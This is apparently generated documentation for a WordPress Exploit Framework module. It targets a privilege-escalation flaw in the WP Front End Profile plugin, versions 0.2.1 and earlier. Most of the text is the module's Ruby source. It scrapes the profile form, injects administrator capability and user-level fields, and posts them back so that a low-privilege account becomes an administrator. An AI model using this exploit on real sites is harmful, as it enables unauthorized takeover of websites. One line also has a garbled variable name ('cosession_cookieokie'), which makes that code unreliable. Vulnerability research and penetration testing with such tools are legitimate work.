class Wpxf::Auxiliary::WpFrontEndProfilePrivilegeEscalation
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 6 def initialize super update_info( name: 'WP Front End Profile <= 0.2.1 Privilege Escalation', desc: %( The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated users of any user level to escalate their user role to an administrator. ), author: [ 'rastating' # WPXF module ], references: [ ['WPVDB', '8620'] ], date: 'Sep 15 2016' ) register_options([ StringOption.new( name: 'profile_form_path', desc: 'The path to the page containing the profile editor form', required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 33 def check check_plugin_version_from_readme('wp-front-end', '0.2.2') end
fetch_profile_form()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 45 def fetch_profile_form res = nil scoped_option_change('follow_http_redirection', true) do res = execute_get_request(url: profile_form_url, cookie: session_cookie) end res end
form_fields_with_default_values()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 55 def form_fields_with_default_values res = fetch_profile_form return nil unless res && res.code == 200 fields = {} res.body.scan(/<input.+?name="(.+?)".+?value="(.*?)".*?>/i) do |match| if match[0].start_with?('wpfep_nonce_name', '_wp_http_referer', 'profile[') emit_info "Found field #{match[0]}", true fields[match[0]] = match[1] end end fields end
profile_form_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 41 def profile_form_url normalize_uri(full_uri, datastore['profile_form_path']) end
requires_authentication()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 37 def requires_authentication true end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 70 def run return false unless super emit_info 'Requesting profile editor form...' form_fields = form_fields_with_default_values if form_fields.nil? emit_error 'Failed to retrieve the profile form' return false end form_fields['profile[wp_user_level]'] = 10 form_fields['profile[wp_capabilities][administrator]'] = 1 form_fields['profile[wpfep_save]'] = 'Update Profile' emit_info 'Elevating privileges...' execute_post_request( url: profile_form_url, cookie: cosession_cookieokie, body: form_fields ) end